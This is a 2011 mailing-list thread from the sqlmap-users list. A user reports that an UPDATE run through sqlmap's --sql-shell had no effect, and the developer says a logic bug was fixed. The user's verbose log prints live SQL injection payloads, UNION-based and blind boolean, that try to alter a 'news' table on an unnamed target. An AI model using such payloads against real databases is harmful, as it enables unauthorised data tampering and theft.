Re: [sqlmap-users] When using '--sql-shell' for running UPDATE query this is what I see with -v 3
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] When using '--sql-shell' for running UPDATE query this is what I see with -v 3
|
From: Liran M. <rea...@gm...> - 2011-07-30 23:52:43
|
Thanks Miroslav When this build will be available for download? and you 2 made an amazing app, Tomorrow i'm going to donate to your project, your program is a real pro for me! what's the paypal address for it ? On Sun, Jul 31, 2011 at 12:42 AM, Miroslav Stampar < mir...@gm...> wrote: > hi. > > here was a problem in programs logic that needed to be changed. > > with the last commit there won't be anymore questions like "do you > want to retrieve..." for --sql-shell/--sql-query. this was causing > problems (program did nothing) for non-compatible answers (N for > queries and Y for non-queries). > > to make things short, there was a program logic bug that should be > fixed now with r4307. > > kr > > On Sat, Jul 30, 2011 at 6:52 PM, Liran Mimoni <rea...@gm...> > wrote: > > sql-shell> update news set title = "dasdasd"; > > do you want to retrieve the SQL statement output? [y/N/a] y > > [19:50:14] [INFO] fetching SQL data manipulation query output: 'update > news > > set title = "dasdasd";' > > [19:50:14] [PAYLOAD] -1868 UNION ALL SELECT NULL, NULL, NULL, > > CONCAT(CHAR(58,111,100,99,58),IFNULL(UPDATE news set title = > > "dasdasd";,CHAR(32)),CHAR(58,100,117,121,58)), NULL, NULL# > > [19:50:15] [WARNING] if the problem persists with 'None' values please > try > > to use hidden switch --no-cast (fixing problems with some collation > issues) > > [19:50:15] [DEBUG] performed 1 queries in 0 seconds > > [19:50:15] [PAYLOAD] -3449 > > [19:50:16] [INFO] retrieving the length of query output > > [19:50:16] [PAYLOAD] -1492 OR NOT (ORD(MID((IFNULL(LENGTH(UPDATE news set > > title = "dasdasd";),CHAR(32))),1,1)) > 51) > > [19:50:16] [PAYLOAD] -1492 OR NOT (ORD(MID((IFNULL(LENGTH(UPDATE news set > > title = "dasdasd";),CHAR(32))),1,1)) > 48) > > [19:50:16] [PAYLOAD] -1492 OR NOT (ORD(MID((IFNULL(LENGTH(UPDATE news set > > title = "dasdasd";),CHAR(32))),1,1)) > 1) > > [19:50:17] [INFO] retrieved: > > [19:50:17] [DEBUG] performed 3 queries in 1 seconds > > [19:50:17] [DEBUG] starting 50 threads > > [19:50:17] [PAYLOAD] -1492 OR NOT (ORD(MID((IFNULL(UPDATE news set title > = > > "dasdasd";,CHAR(32))),1,1)) > 64) > > [19:50:17] [PAYLOAD] -1492 OR NOT (ORD(MID((IFNULL(UPDATE news set title > = > > "dasdasd";,CHAR(32))),1,1)) > 32) > > [19:50:17] [PAYLOAD] -1492 OR NOT (ORD(MID((IFNULL(UPDATE news set title > = > > "dasdasd";,CHAR(32))),1,1)) > 16) > > [19:50:18] [PAYLOAD] -1492 OR NOT (ORD(MID((IFNULL(UPDATE news set title > = > > "dasdasd";,CHAR(32))),1,1)) > 8) > > [19:50:18] [PAYLOAD] -1492 OR NOT (ORD(MID((IFNULL(UPDATE news set title > = > > "dasdasd";,CHAR(32))),1,1)) > 4) > > [19:50:18] [PAYLOAD] -1492 OR NOT (ORD(MID((IFNULL(UPDATE news set title > = > > "dasdasd";,CHAR(32))),1,1)) > 2) > > [19:50:18] [PAYLOAD] -1492 OR NOT (ORD(MID((IFNULL(UPDATE news set title > = > > "dasdasd";,CHAR(32))),1,1)) > 1) > > [19:50:19] [INFO] retrieved: > > [19:50:19] [DEBUG] performed 7 queries in 3 seconds > > > > the update command didnt work, it didnt updated the requested column > > Please help me thanks > > > ------------------------------------------------------------------------------ > > Got Input? Slashdot Needs You. > > Take our quick survey online. Come on, we don't ask for help often. > > Plus, you'll get a chance to win $100 to spend on ThinkGeek. > > http://p.sf.net/sfu/slashdot-survey > > _______________________________________________ > > sqlmap-users mailing list > > sql...@li... > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > > > > > > > > -- > Miroslav Stampar (@stamparm) > > E-mail: miroslav.stampar (at) gmail.com > PGP Key ID: 0xB5397B1B > |
